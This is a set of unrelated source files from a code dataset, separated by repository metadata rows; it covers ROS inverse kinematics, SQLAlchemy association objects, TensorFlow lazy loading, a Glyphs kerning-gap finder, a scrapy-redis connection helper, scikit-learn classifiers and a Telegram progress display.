viz_manager.add_ik_target('13')
rate = rospy.Rate(10)
while not rospy.is_shutdown():
if ik_target:
for link_id in ik_target:
ro.inverse_kinematics_LM(int(link_id), LinkNode(id=-1, name=link_id + '_target', p=ik_target[link_id], R=rpy2rot(0, 0, 0))) # R4,5,6 Rotation 구현상 편하려면 IK target or rotation
marker_array = ulink_to_marker_array(ro.ulink)
pub.publish(marker_array)
rate.sleep()
if __name__ == '__main__':
try:
rk_api()
except rospy.ROSInterruptException:
pass
| 29.041667 | 188 | 0.714491 |
acfa692d2d4674048702af9edd9eda7b981aa5e8 | 4,576 | py | Python | examples/01_association/01_basic_association.py | lanzhiwang/sqlalchemy | c4b07f75baa68005f41244372e97dc1c591f45da | [
"MIT"
] | null | null | null | examples/01_association/01_basic_association.py | lanzhiwang/sqlalchemy | c4b07f75baa68005f41244372e97dc1c591f45da | [
"MIT"
] | null | null | null | examples/01_association/01_basic_association.py | lanzhiwang/sqlalchemy | c4b07f75baa68005f41244372e97dc1c591f45da | [
"MIT"
] | null | null | null | """Illustrate a many-to-many relationship between an
"Order" and a collection of "Item" objects, associating a purchase price
with each via an association object called "OrderItem"
The association object pattern is a form of many-to-many which
associates additional data with each association between parent/child.
The example illustrates an "order", referencing a collection
of "items", with a particular price paid associated with each "item".
"""
from datetime import datetime
from sqlalchemy import and_
from sqlalchemy import Column
from sqlalchemy import create_engine
from sqlalchemy import DateTime
from sqlalchemy import Float
from sqlalchemy import ForeignKey
from sqlalchemy import Integer
from sqlalchemy import String
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy.orm import Session
Base = declarative_base()
"""
CREATE TABLE "order" (
order_id INTEGER NOT NULL,
customer_name VARCHAR(30) NOT NULL,
order_date DATETIME NOT NULL,
PRIMARY KEY (order_id)
)
CREATE TABLE item (
item_id INTEGER NOT NULL,
description VARCHAR(30) NOT NULL,
price FLOAT NOT NULL,
PRIMARY KEY (item_id)
)
CREATE TABLE orderitem (
order_id INTEGER NOT NULL,
item_id INTEGER NOT NULL,
price FLOAT NOT NULL,
PRIMARY KEY (order_id, item_id),
FOREIGN KEY(order_id) REFERENCES "order" (order_id),
FOREIGN KEY(item_id) REFERENCES item (item_id)
)
"""
class Order(Base):
__tablename__ = "order"
order_id = Column(Integer, primary_key=True)
customer_name = Column(String(30), nullable=False)
order_date = Column(DateTime, nullable=False, default=datetime.now())
order_items = relationship(
"OrderItem", cascade="all, delete-orphan", backref="order"
)
def __init__(self, customer_name):
self.customer_name = customer_name
class Item(Base):
__tablename__ = "item"
item_id = Column(Integer, primary_key=True)
description = Column(String(30), nullable=False)
price = Column(Float, nullable=False)
def __init__(self, description, price):
self.description = description
self.price = price
def __repr__(self):
return "Item(%r, %r)" % (self.description, self.price)
class OrderItem(Base):
__tablename__ = "orderitem"
order_id = Column(Integer, ForeignKey("order.order_id"), primary_key=True)
item_id = Column(Integer, ForeignKey("item.item_id"), primary_key=True)
price = Column(Float, nullable=False)
def __init__(self, item, price=None):
self.item = item
self.price = price or item.price
item = relationship(Item, lazy="joined")
if __name__ == "__main__":
engine = create_engine('sqlite:///cookies.db')
Base.metadata.create_all(engine)
session = Session(engine)
# create catalog
tshirt, mug, hat, crowbar = (
Item("SA T-Shirt", 10.99),
Item("SA Mug", 6.50),
Item("SA Hat", 8.99),
Item("MySQL Crowbar", 16.99),
)
session.add_all([tshirt, mug, hat, crowbar])
session.commit()
# create an order
order = Order("john smith")
# add three OrderItem associations to the Order and save
order.order_items.append(OrderItem(mug))
order.order_items.append(OrderItem(crowbar, 10.99))
order.order_items.append(OrderItem(hat))
session.add(order)
session.commit()
# query the order, print items
query = session.query(Order).filter_by(customer_name="john smith")
print(query)
"""
SELECT "order".order_id AS order_order_id, "order".customer_name AS order_customer_name, "order".order_date AS order_order_date
FROM "order"
WHERE "order".customer_name = ?
"""
order = query.one()
print(
[
(order_item.item.description, order_item.price)
for order_item in order.order_items
]
)
"""
[('SA Mug', 6.5), ('SA Hat', 8.99), ('MySQL Crowbar', 10.99)]
"""
# print customers who bought 'MySQL Crowbar' on sale
q = session.query(Order).join("order_items", "item")
q = q.filter(
and_(Item.description == "MySQL Crowbar", Item.price > OrderItem.price)
)
print(q)
"""
SELECT
"order".order_id AS order_order_id,
"order".customer_name AS order_customer_name,
"order".order_date AS order_order_date
FROM "order"
JOIN orderitem ON "order".order_id = orderitem.order_id
JOIN item ON item.item_id = orderitem.item_id
WHERE item.description = ? AND item.price > orderitem.price
"""
print([order.customer_name for order in q])
| 28.6 | 131 | 0.6934 |
acfa6968a5dd402d5139b42ca86657a298c9a1bf | 818 | py | Python | tf/02_lazy_loading.py | rxy007/python_code | ed98915e24ef588748ae47790ca89292b5e9bfd2 | [
"MIT"
] | 11 | 2018-12-19T01:48:33.000Z | 2022-03-25T14:24:07.000Z | tf/02_lazy_loading.py | rxy007/python_code | ed98915e24ef588748ae47790ca89292b5e9bfd2 | [
"MIT"
] | null | null | null | tf/02_lazy_loading.py | rxy007/python_code | ed98915e24ef588748ae47790ca89292b5e9bfd2 | [
"MIT"
] | 2 | 2020-01-01T02:40:18.000Z | 2021-12-10T10:33:21.000Z | import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
import tensorflow as tf
# normal loading
x = tf.Variable(10, name='x')
y = tf.Variable(20, name='y')
z = tf.add(x, y)
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
writer = tf.summary.FileWriter('graphs/normal_loading', sess.graph)
for _ in range(10):
sess.run(z)
print(tf.get_default_graph().as_graph_def())
writer.close()
# lazy loading
# 这种方法可能导致内存溢出
x = tf.Variable(10, name='x')
y = tf.Variable(20, name='y')
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
writer = tf.summary.FileWriter('graphs/lazy_loading', sess.graph)
for _ in range(10):
sess.run(tf.add(x, y))
print(tf.get_default_graph().as_graph_def())
writer.close()
| 22.722222 | 71 | 0.672372 |
acfa69dd7cf7609377aa847b4f3364cdbebe1036 | 15,053 | py | Python | Kerning/GapFinder.py | NaN-xyz/Glyphs-Scripts | bdacf455babc72e0801d8d8db5dc10f8e88aa37b | [
"Apache-2.0"
] | 1 | 2022-01-09T04:28:36.000Z | 2022-01-09T04:28:36.000Z | Kerning/GapFinder.py | NaN-xyz/Glyphs-Scripts | bdacf455babc72e0801d8d8db5dc10f8e88aa37b | [
"Apache-2.0"
] | null | null | null | Kerning/GapFinder.py | NaN-xyz/Glyphs-Scripts | bdacf455babc72e0801d8d8db5dc10f8e88aa37b | [
"Apache-2.0"
] | null | null | null | #MenuTitle: GapFinder
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
__doc__="""
Opens a new tab with kerning combos that have large gaps in the current fontmaster.
"""
import vanilla
from timeit import default_timer as timer
from Foundation import NSNotFound
intervalList = (1,3,5,10,20)
categoryList = (
"Letter:Uppercase",
"Letter:Lowercase",
"Letter:Smallcaps",
"Punctuation",
"Symbol:Currency",
"Symbol:Math",
"Symbol:Other",
"Symbol:Arrow",
"Number:Decimal Digit",
"Number:Small",
"Number:Fraction",
)
class GapFinder( object ):
def __init__( self ):
# Window 'self.w':
windowWidth = 390
windowHeight = 260
windowWidthResize = 800 # user can resize width by this value
windowHeightResize = 0 # user can resize height by this value
self.w = vanilla.FloatingWindow(
( windowWidth, windowHeight ), # default window size
"GapFinder", # window title
minSize = ( windowWidth, windowHeight ), # Maximum size (for resizing)
maxSize = ( windowWidth + windowWidthResize, windowHeight + windowHeightResize ), # maximum size (for resizing)
autosaveName = "com.mekkablue.GapFinder.mainwindow" # stores last window position and size
)
# UI elements:
linePos, inset, lineHeight = 12, 15, 22
self.w.descriptionText = vanilla.TextBox( (inset, linePos+2, -inset, 14), u"Open tab with kern gaps in current master:", sizeStyle='small', selectable=True )
linePos += lineHeight
self.w.textScript = vanilla.TextBox( (inset, linePos+2, 42, 14), u"Script:", sizeStyle='small', selectable=True )
self.w.popupScript = vanilla.ComboBox( (inset+42, linePos-1, 110, 18), ("latin","cyrillic","greek"), callback=self.SavePreferences, sizeStyle='small' )
self.w.textDistance = vanilla.TextBox( (inset+160, linePos+2, 100, 14), "Max distance:", sizeStyle='small' )
self.w.maxDistance = vanilla.EditText( (inset+240, linePos-1, -15, 19), "200", sizeStyle='small')
linePos += lineHeight
self.w.textSpeed = vanilla.TextBox( (inset, linePos+2, 42, 14), u"Speed:", sizeStyle='small', selectable=True )
self.w.popupSpeed = vanilla.PopUpButton( (inset+42, linePos, 110, 17), ("very slow","slow","medium","fast","very fast"), callback=self.SavePreferences, sizeStyle='small' )
intervalIndex = Glyphs.defaults["com.mekkablue.GapFinder.popupSpeed"]
if intervalIndex is None:
intervalIndex = 0
self.w.text_speedExplanation = vanilla.TextBox( (inset+160, linePos+2, -inset, 14), "Measuring every %i units."%intervalList[intervalIndex], sizeStyle='small' )
linePos += lineHeight
self.w.text_3 = vanilla.TextBox( (inset, linePos+2, 90, 14), "Left Category:", sizeStyle='small' )
self.w.popupLeftCat = vanilla.PopUpButton( (inset+90, linePos, -inset, 17), categoryList, callback=self.SavePreferences, sizeStyle='small' )
linePos += lineHeight
self.w.text_4 = vanilla.TextBox( (inset, linePos+2, 90, 14), "Right Category:", sizeStyle='small' )
self.w.popupRightCat = vanilla.PopUpButton( (inset+90, linePos, -inset, 17), categoryList, callback=self.SavePreferences, sizeStyle='small' )
linePos += lineHeight
self.w.text_5 = vanilla.TextBox( (inset, linePos+2, 160, 14), "Exclude glyphs containing:", sizeStyle='small' )
self.w.excludeSuffixes = vanilla.EditText( (inset+150, linePos, -inset, 19), ".locl, .alt, .sups, .sinf, .tf, .tosf, Ldot, ldot, Jacute, jacute", callback=self.SavePreferences, sizeStyle='small')
linePos += lineHeight
self.w.excludeNonExporting = vanilla.CheckBox( (inset, linePos, -inset, 20), "Exclude non-exporting glyphs", value=True, sizeStyle='small', callback=self.SavePreferences )
linePos += lineHeight
self.w.reportGapsInMacroWindow = vanilla.CheckBox( (inset, linePos, -inset, 20), "Also report in Macro Window (a few seconds slower)", value=False, sizeStyle='small', callback=self.SavePreferences )
linePos += lineHeight
# Percentage:
self.w.bar = vanilla.ProgressBar((inset, linePos, -inset, 16))
#self.w.percentage = vanilla.TextBox( (15-1, -30, -100-15, -15), "", sizeStyle='small' )
# Run Button:
self.w.runButton = vanilla.Button((-100-15, -20-15, -15, -15), "Open Tab", sizeStyle='regular', callback=self.GapFinderMain )
self.w.setDefaultButton( self.w.runButton )
# Load Settings:
if not self.LoadPreferences():
print("Note: 'GapFinder' could not load preferences. Will resort to defaults")
# Open window and focus on it:
self.w.open()
self.w.makeKey()
def SavePreferences( self, sender ):
try:
Glyphs.defaults["com.mekkablue.GapFinder.popupScript"] = self.w.popupScript.get()
Glyphs.defaults["com.mekkablue.GapFinder.popupSpeed"] = self.w.popupSpeed.get()
Glyphs.defaults["com.mekkablue.GapFinder.popupLeftCat"] = self.w.popupLeftCat.get()
Glyphs.defaults["com.mekkablue.GapFinder.popupRightCat"] = self.w.popupRightCat.get()
Glyphs.defaults["com.mekkablue.GapFinder.excludeSuffixes"] = self.w.excludeSuffixes.get()
Glyphs.defaults["com.mekkablue.GapFinder.excludeNonExporting"] = self.w.excludeNonExporting.get()
Glyphs.defaults["com.mekkablue.GapFinder.maxDistance"] = self.w.maxDistance.get()
Glyphs.defaults["com.mekkablue.GapFinder.reportGapsInMacroWindow"] = self.w.reportGapsInMacroWindow.get()
except Exception as e:
return False
# update speed explanation:
if sender == self.w.popupSpeed:
intervalIndex = Glyphs.defaults["com.mekkablue.GapFinder.popupSpeed"]
if intervalIndex is None:
intervalIndex = 0
self.w.text_speedExplanation.set( "Measuring every %i units." % intervalList[intervalIndex] )
return True
def LoadPreferences( self ):
try:
Glyphs.registerDefault( "com.mekkablue.GapFinder.maxDistance", "200" )
Glyphs.registerDefault( "com.mekkablue.GapFinder.popupScript", "latin" )
Glyphs.registerDefault( "com.mekkablue.GapFinder.popupSpeed", 0 )
Glyphs.registerDefault( "com.mekkablue.GapFinder.popupLeftCat", 0 )
Glyphs.registerDefault( "com.mekkablue.GapFinder.popupRightCat", 0 )
Glyphs.registerDefault( "com.mekkablue.GapFinder.excludeSuffixes", ".locl, .alt, .sups, .sinf, .tf, .tosf, Ldot, ldot, Jacute, jacute" )
Glyphs.registerDefault( "com.mekkablue.GapFinder.excludeNonExporting", 1 )
Glyphs.registerDefault( "com.mekkablue.GapFinder.reportGapsInMacroWindow", 0 )
self.w.maxDistance.set( Glyphs.defaults["com.mekkablue.GapFinder.maxDistance"] )
self.w.popupScript.set( Glyphs.defaults["com.mekkablue.GapFinder.popupScript"] )
self.w.popupSpeed.set( Glyphs.defaults["com.mekkablue.GapFinder.popupSpeed"] )
self.w.popupLeftCat.set( Glyphs.defaults["com.mekkablue.GapFinder.popupLeftCat"] )
self.w.popupRightCat.set( Glyphs.defaults["com.mekkablue.GapFinder.popupRightCat"] )
self.w.excludeSuffixes.set( Glyphs.defaults["com.mekkablue.GapFinder.excludeSuffixes"] )
self.w.excludeNonExporting.set( Glyphs.defaults["com.mekkablue.GapFinder.excludeNonExporting"] )
self.w.reportGapsInMacroWindow.set( Glyphs.defaults["com.mekkablue.GapFinder.reportGapsInMacroWindow"] )
except:
return False
return True
def nameUntilFirstPeriod( self, glyphName ):
if not "." in glyphName:
return glyphName
else:
offset = glyphName.find(".")
return glyphName[:offset]
def effectiveKerning( self, leftGlyphName, rightGlyphName, thisFont, thisFontMasterID ):
leftLayer = thisFont.glyphs[leftGlyphName].layers[thisFontMasterID]
rightLayer = thisFont.glyphs[rightGlyphName].layers[thisFontMasterID]
effectiveKerning = leftLayer.rightKerningForLayer_( rightLayer )
if effectiveKerning < NSNotFound:
return effectiveKerning
else:
return 0.0
def listOfNamesForCategories( self, thisFont, requiredCategory, requiredSubCategory, requiredScript, excludedGlyphNameParts, excludeNonExporting ):
nameList = []
for thisGlyph in thisFont.glyphs:
thisScript = thisGlyph.script
glyphName = thisGlyph.name
nameIsOK = True
if excludedGlyphNameParts:
for thisNamePart in excludedGlyphNameParts:
nameIsOK = nameIsOK and not thisNamePart in glyphName
if nameIsOK and (thisGlyph.export or not excludeNonExporting):
if thisScript == None or thisScript == requiredScript:
if thisGlyph.category == requiredCategory:
if requiredSubCategory:
if thisGlyph.subCategory == requiredSubCategory:
nameList.append( glyphName )
else:
nameList.append( glyphName )
return nameList
def splitString( self, string, delimiter=":", Maximum=2 ):
# split string into a list:
returnList = string.split(delimiter)
# remove trailing spaces:
for i in range(len(returnList)):
returnList[i] = returnList[i].strip()
# if necessary fill up with None:
while len(returnList) < Maximum:
returnList.append(None)
if returnList == [""]:
return None
return returnList
def measureLayerAtHeightFromLeftOrRight( self, thisLayer, height, leftSide=True ):
try:
if leftSide:
measurement = thisLayer.lsbAtHeight_(height)
else:
measurement = thisLayer.rsbAtHeight_(height)
if measurement < NSNotFound:
return measurement
else:
return None
except:
return None
def minDistanceBetweenTwoLayers( self, leftLayer, rightLayer, interval=5.0, kerning=0.0, report=False ):
# correction = leftLayer.RSB+rightLayer.LSB
topY = min( leftLayer.bounds.origin.y+leftLayer.bounds.size.height, rightLayer.bounds.origin.y+rightLayer.bounds.size.height )
bottomY = max( leftLayer.bounds.origin.y, rightLayer.bounds.origin.y )
distance = topY - bottomY
minDist = None
for i in range(int(distance//interval)):
height = bottomY + i * interval
left = self.measureLayerAtHeightFromLeftOrRight( leftLayer, height, leftSide=False )
right = self.measureLayerAtHeightFromLeftOrRight( rightLayer, height, leftSide=True )
try: # avoid gaps like in i or j
total = left+right+kerning # +correction
if minDist == None or minDist > total:
minDist = total
except:
pass
return minDist
def queryPrefs( self ):
script = Glyphs.defaults["com.mekkablue.GapFinder.popupScript"]
firstCategory, firstSubCategory = self.splitString( self.w.popupLeftCat.getItems()[ Glyphs.defaults["com.mekkablue.GapFinder.popupLeftCat"] ] )
secondCategory, secondSubCategory = self.splitString( self.w.popupRightCat.getItems()[ Glyphs.defaults["com.mekkablue.GapFinder.popupRightCat"] ] )
return script, firstCategory, firstSubCategory, secondCategory, secondSubCategory
def GapFinderMain( self, sender ):
try:
# update settings to the latest user input:
if not self.SavePreferences( self ):
print("Note: 'GapFinder' could not write preferences.")
# query frontmost fontmaster:
thisFont = Glyphs.font
thisFontMaster = thisFont.selectedFontMaster
thisFontMasterID = thisFontMaster.id
# reset progress bar:
self.w.bar.set(0)
# start taking time:
start = timer()
# start reporting to macro window:
if Glyphs.defaults["com.mekkablue.GapFinder.reportGapsInMacroWindow"]:
Glyphs.clearLog()
print("GapFinder Report for %s, master %s:\n" % (thisFont.familyName, thisFontMaster.name))
# query user input:
script, firstCategory, firstSubCategory, secondCategory, secondSubCategory = self.queryPrefs()
step = intervalList[ Glyphs.defaults["com.mekkablue.GapFinder.popupSpeed"] ]
excludedGlyphNameParts = self.splitString( Glyphs.defaults["com.mekkablue.GapFinder.excludeSuffixes"], delimiter=",", Maximum=0 )
excludeNonExporting = bool( Glyphs.defaults["com.mekkablue.GapFinder.excludeNonExporting"] )
maxDistance = 200.0 # default
try:
maxDistance = float( Glyphs.defaults["com.mekkablue.GapFinder.maxDistance"] )
except Exception as e:
print("Warning: Could not read min distance entry. Will default to 200.\n%s" % e)
import traceback
print(traceback.format_exc())
print()
# save prefs
if not self.SavePreferences(None):
print("Note: GapFinder could not write preferences.")
# get list of glyph names:
firstList = self.listOfNamesForCategories( thisFont, firstCategory, firstSubCategory, script, excludedGlyphNameParts, excludeNonExporting )
secondList = self.listOfNamesForCategories( thisFont, secondCategory, secondSubCategory, script, excludedGlyphNameParts, excludeNonExporting )
if Glyphs.defaults["com.mekkablue.GapFinder.reportGapsInMacroWindow"]:
print("Maximum Distance: %i\n" % maxDistance)
print("Left glyphs:\n%s\n" % ", ".join(firstList))
print("Right glyphs:\n%s\n" % ", ".join(secondList))
tabString = "\n"
gapCount = 0
numOfGlyphs = len(firstList)
for index in range(numOfGlyphs):
# update progress bar:
self.w.bar.set( int(100*(float(index)/numOfGlyphs)) )
# determine left glyph:
firstGlyphName = firstList[index]
leftLayer = thisFont.glyphs[firstGlyphName].layers[thisFontMasterID]
# cycle through right glyphs:
for secondGlyphName in secondList:
rightLayer = thisFont.glyphs[secondGlyphName].layers[thisFontMasterID]
kerning = self.effectiveKerning( firstGlyphName, secondGlyphName, thisFont, thisFontMasterID )
distanceBetweenShapes = self.minDistanceBetweenTwoLayers( leftLayer, rightLayer, interval=step, kerning=kerning, report=False )
if (not distanceBetweenShapes is None) and (distanceBetweenShapes > maxDistance):
gapCount += 1
tabString += "/%s/%s/space" % ( firstGlyphName, secondGlyphName )
if Glyphs.defaults["com.mekkablue.GapFinder.reportGapsInMacroWindow"]:
print("- %s %s: %i" % ( firstGlyphName, secondGlyphName, distanceBetweenShapes ))
tabString += "\n"
# clean up the tab string:
tabString = tabString[:-6].replace("/space\n", "\n")
while "\n\n" in tabString:
tabString = tabString.replace("\n\n", "\n")
tabString = tabString[1:]
# update progress bar:
self.w.bar.set( 100 )
# take time:
end = timer()
seconds = end - start
if seconds > 60.0:
timereport = "%i:%02i minutes" % ( seconds//60, seconds%60 )
elif seconds < 1.0:
timereport = "%.2f seconds" % seconds
elif seconds < 20.0:
timereport = "%.1f seconds" % seconds
else:
timereport = "%i seconds" % seconds
# open new Edit tab:
if tabString:
if len(tabString) > 40:
# disable reporters (avoid slowdown)
Glyphs.defaults["visibleReporters"] = None
report = '%i kerning gaps have been found. Time elapsed: %s.' % (gapCount, timereport)
thisFont.newTab( tabString )
# or report that nothing was found:
else:
report = 'No collisions found. Time elapsed: %s. Congrats!' % timereport
# Notification:
notificationTitle = "GapFinder: %s (%s)" % (thisFont.familyName, thisFontMaster.name)
Glyphs.showNotification( notificationTitle, report )
# Report in Macro Window:
if Glyphs.defaults["com.mekkablue.GapFinder.reportGapsInMacroWindow"]:
print(report)
Glyphs.showMacroWindow()
except Exception as e:
print("GapFinder Error: %s" % e)
import traceback
print(traceback.format_exc())
GapFinder()
| 42.764205 | 200 | 0.722846 |
acfa6a43cd0579bcbf61907b13c1b60e49b20e49 | 116 | py | Python | src/Chapter6/exercise1.py | group15bse/BSE-2021 | caf2c8ef9812f339bba3bc1e818cdc150d5440d1 | [
"MIT"
] | null | null | null | src/Chapter6/exercise1.py | group15bse/BSE-2021 | caf2c8ef9812f339bba3bc1e818cdc150d5440d1 | [
"MIT"
] | null | null | null | src/Chapter6/exercise1.py | group15bse/BSE-2021 | caf2c8ef9812f339bba3bc1e818cdc150d5440d1 | [
"MIT"
] | 1 | 2021-05-08T11:17:40.000Z | 2021-05-08T11:17:40.000Z | word=input("Enter word:")
index=-1
while index+1>-(len(word)):
letter=word[index]
print(letter)
index-=1 | 19.333333 | 27 | 0.637931 |
acfa6b010ae43685395bcdf4ad4064f0bab9c4b2 | 2,571 | py | Python | src/scrapy_redis/connection.py | Restill/scrapy-redis | ec3a6eb3d2ca08f686cbf926b56ad849b0c55cae | [
"MIT"
] | 1 | 2021-09-03T01:01:50.000Z | 2021-09-03T01:01:50.000Z | src/scrapy_redis/connection.py | Restill/scrapy-redis | ec3a6eb3d2ca08f686cbf926b56ad849b0c55cae | [
"MIT"
] | null | null | null | src/scrapy_redis/connection.py | Restill/scrapy-redis | ec3a6eb3d2ca08f686cbf926b56ad849b0c55cae | [
"MIT"
] | null | null | null | import six
from scrapy.utils.misc import load_object
from . import defaults
# Shortcut maps 'setting name' -> 'parmater name'.
SETTINGS_PARAMS_MAP = {
'REDIS_URL': 'url',
'REDIS_HOST': 'host',
'REDIS_PORT': 'port',
'REDIS_ENCODING': 'encoding',
'REDIS_CLUSTER': 'cluster',
}
def get_redis_from_settings(settings):
"""Returns a redis client instance from given Scrapy settings object.
This function uses ``get_client`` to instantiate the client and uses
``defaults.REDIS_PARAMS`` global as defaults values for the parameters. You
can override them using the ``REDIS_PARAMS`` setting.
Parameters
----------
settings : Settings
A scrapy settings object. See the supported settings below.
Returns
-------
server
Redis client instance.
Other Parameters
----------------
REDIS_URL : str, optional
Server connection URL.
REDIS_HOST : str, optional
Server host.
REDIS_PORT : str, optional
Server port.
REDIS_ENCODING : str, optional
Data encoding.
REDIS_CLUSTER : bool, optional
True for using reids-cluster, False for not.
REDIS_PARAMS : dict, optional
Additional client parameters.
"""
params = defaults.REDIS_PARAMS.copy()
params.update(settings.getdict('REDIS_PARAMS'))
# XXX: Deprecate REDIS_* settings.
for source, dest in SETTINGS_PARAMS_MAP.items():
val = settings.get(source)
if val:
params[dest] = val
# Allow ``redis_cls`` to be a path to a class.
if isinstance(params.get('redis_cls'), six.string_types):
params['redis_cls'] = load_object(params['redis_cls'])
return get_redis(**params)
# Backwards compatible alias.
from_settings = get_redis_from_settings
def get_redis(**kwargs):
"""Returns a redis client instance.
Parameters
----------
redis_cls : class, optional
Defaults to ``redis.StrictRedis``.
url : str, optional
If given, ``redis_cls.from_url`` is used to instantiate the class.
**kwargs
Extra parameters to be passed to the ``redis_cls`` class.
Returns
-------
server
Redis client instance.
"""
cluster = kwargs.pop('cluster', False)
if cluster:
redis_cls = kwargs.pop('redis_cls', defaults.REDISCLUSTER_CLS)
else:
redis_cls = kwargs.pop('redis_cls', defaults.REDIS_CLS)
url = kwargs.pop('url', None)
if url:
return redis_cls.from_url(url, **kwargs)
else:
return redis_cls(**kwargs)
| 26.234694 | 79 | 0.643329 |
acfa6bbebb40a259f65c440e21d8c913dffb5bf9 | 1,593 | py | Python | 02_pair/predtool.py | lazyDamon/siamese-neural-networks | a9f395e531ce51be0c85fa66ef091c4a6b1b65f8 | [
"MIT"
] | 8 | 2019-10-22T15:09:49.000Z | 2020-12-26T04:40:47.000Z | 02_pair/predtool.py | GuillerLT/siamese_neural_networks | a9f395e531ce51be0c85fa66ef091c4a6b1b65f8 | [
"MIT"
] | null | null | null | 02_pair/predtool.py | GuillerLT/siamese_neural_networks | a9f395e531ce51be0c85fa66ef091c4a6b1b65f8 | [
"MIT"
] | 4 | 2020-04-27T18:32:11.000Z | 2021-05-17T12:23:50.000Z | import numpy as np
from sklearn.svm import SVR
from sklearn.ensemble import RandomForestClassifier
from sklearn.neighbors import KNeighborsClassifier
def hist(e_tr, y_tr, e_te, y_te):
n_k = len(np.unique(y_tr))
def preddiction(i_te, e_tr):
def distance(i_tr, i_te):
return np.linalg.norm(i_tr - i_te)
return np.argmin(
np.average(
np.reshape(
np.apply_along_axis(distance, 1, e_tr, i_te),
(n_k, -1)
),
1
)
)
# distancias = np.reshape(np.apply_along_axis(distance, 1, e_tr, i_te),
# (len(np.unique(y_te)), -1))
# medias = np.average(distancias, 1)
# indice = np.argmin(medias)
p_te = np.apply_along_axis(preddiction, 1, e_te, e_tr)
acc = (y_te == p_te).mean()
print('Accuracy on test set (hist): %0.4f%%' % (acc))
def acc(clf, str, e_tr, y_tr, e_te, y_te):
clf.fit(e_tr, y_tr)
acc = clf.score(e_te, y_te)
print('Accuracy on test set ({}): %0.4f%%'.format(str) % (acc))
def svr(e_tr, y_tr, e_te, y_te, kernel='rbf'):
clf = SVR(kernel=kernel, gamma='auto')
acc(clf, ' svr', e_tr, y_tr, e_te, y_te)
def rf(e_tr, y_tr, e_te, y_te, n_estimators=100):
clf = RandomForestClassifier(n_estimators=n_estimators)
acc(clf, ' rf', e_tr, y_tr, e_te, y_te)
def knn(e_tr, y_tr, e_te, y_te, n_neighbors=100):
clf = KNeighborsClassifier(n_neighbors)
acc(clf, ' knn', e_tr, y_tr, e_te, y_te)
| 31.86 | 80 | 0.565599 |
acfa6c506351bde3469ff23d3e186f34cf454f80 | 330 | py | Python | gallery/urls.py | Nijinsha/Inshare | ebbeb904ae20b997df385cad589121bc46d67728 | [
"MIT"
] | null | null | null | gallery/urls.py | Nijinsha/Inshare | ebbeb904ae20b997df385cad589121bc46d67728 | [
"MIT"
] | null | null | null | gallery/urls.py | Nijinsha/Inshare | ebbeb904ae20b997df385cad589121bc46d67728 | [
"MIT"
] | 1 | 2019-11-21T17:16:49.000Z | 2019-11-21T17:16:49.000Z | from django.urls import path
from .views import PhotoUploadView, PhotoThumbListView, PhotoDeleteView
urlpatterns = [
path('upload/', PhotoUploadView.as_view(), name="upload"),
path('get-thumbs/', PhotoThumbListView.as_view(), name="get_thumbs"),
path('<int:pk>/delete/', PhotoDeleteView.as_view(), name="delete"),
]
| 33 | 73 | 0.724242 |
acfa6ca1b091ce745295596149a7b1ec9e063029 | 2,373 | py | Python | helper_funcs/display_progress.py | kristy-offl/URL-With-BROADCAST | 33b6db252ec9c7d1e69d8386d5fbed10c785776b | [
"MIT"
] | null | null | null | helper_funcs/display_progress.py | kristy-offl/URL-With-BROADCAST | 33b6db252ec9c7d1e69d8386d5fbed10c785776b | [
"MIT"
] | null | null | null | helper_funcs/display_progress.py | kristy-offl/URL-With-BROADCAST | 33b6db252ec9c7d1e69d8386d5fbed10c785776b | [
"MIT"
] | 2 | 2021-10-05T12:10:57.000Z | 2021-11-02T04:46:37.000Z | import os
import math
import time
async def progress_for_pyrogram(
current,
total,
ud_type,
message,
start
):
now = time.time()
diff = now - start
if round(diff % 10.00) == 0 or current == total:
# if round(current / total * 100, 0) % 5 == 0:
percentage = current * 100 / total
speed = current / diff
elapsed_time = round(diff) * 1000
time_to_completion = round((total - current) / speed) * 1000
estimated_total_time = elapsed_time + time_to_completion
elapsed_time = TimeFormatter(milliseconds=elapsed_time)
estimated_total_time = TimeFormatter(milliseconds=estimated_total_time)
progress = "[{0}{1}] \n<b>➩ Percentage :- {2}%</b>\n".format(
''.join(["▣" for i in range(math.floor(percentage / 10))]),
''.join(["□" for i in range(10 - math.floor(percentage / 10))]),
round(percentage, 2))
tmp = progress + "<b>➩ Completed :- {0}</b>\n<b>➩ Size :- {1}</b>\n<b>➩ Speed :- {2}/s</b>\n<b>➩ ETA :- {3}</b>\n".format(
humanbytes(current),
humanbytes(total),
humanbytes(speed),
# elapsed_time if elapsed_time != '' else "0 s",
estimated_total_time if estimated_total_time != '' else "0 s"
)
try:
await message.edit(
text="{}\n{}".format(
ud_type,
tmp
)
)
except:
pass
def humanbytes(size):
# https://stackoverflow.com/a/49361727/4723940
# 2**10 = 1024
if not size:
return ""
power = 2**10
n = 0
Dic_powerN = {0: ' ', 1: 'Ki', 2: 'Mi', 3: 'Gi', 4: 'Ti'}
while size > power:
size /= power
n += 1
return str(round(size, 2)) + " " + Dic_powerN[n] + 'B'
def TimeFormatter(milliseconds: int) -> str:
seconds, milliseconds = divmod(int(milliseconds), 1000)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
tmp = ((str(days) + "d, ") if days else "") + \
((str(hours) + "h, ") if hours else "") + \
((str(minutes) + "m, ") if minutes else "") + \
((str(seconds) + "s, ") if seconds else "") + \
((str(milliseconds) + "ms, ") if milliseconds else "")
return tmp[:-2]
| 32.067568 | 131 | 0.525917 |
acfa6eb6e0e64a3b0ef181700215e3897a79777d | 261 | py | Python | hunter_douglas/hunter_douglas/doctype/clearance_certificate/clearance_certificate.py | thispl/hunter-douglas | b3a3a8a7087a042703ff33259a62b8b13ca87c82 | [
"MIT"
] | null | null | null | hunter_douglas/hunter_douglas/doctype/clearance_certificate/clearance_certificate.py | thispl/hunter-douglas | b3a3a8a7087a042703ff33259a62b8b13ca87c82 | [
"MIT"
] | null | null | null | hunter_douglas/hunter_douglas/doctype/clearance_certificate/clearance_certificate.py | thispl/hunter-douglas | b3a3a8a7087a042703ff33259a62b8b13ca87c82 | [
"MIT"
] | 1 | 2019-12-31T06:52:12.000Z | 2019-12-31T06:52:12.000Z | # -*- coding: utf-8 -*-
# Copyright (c) 2020, VHRS and contributors
# For license information, please see license.txt
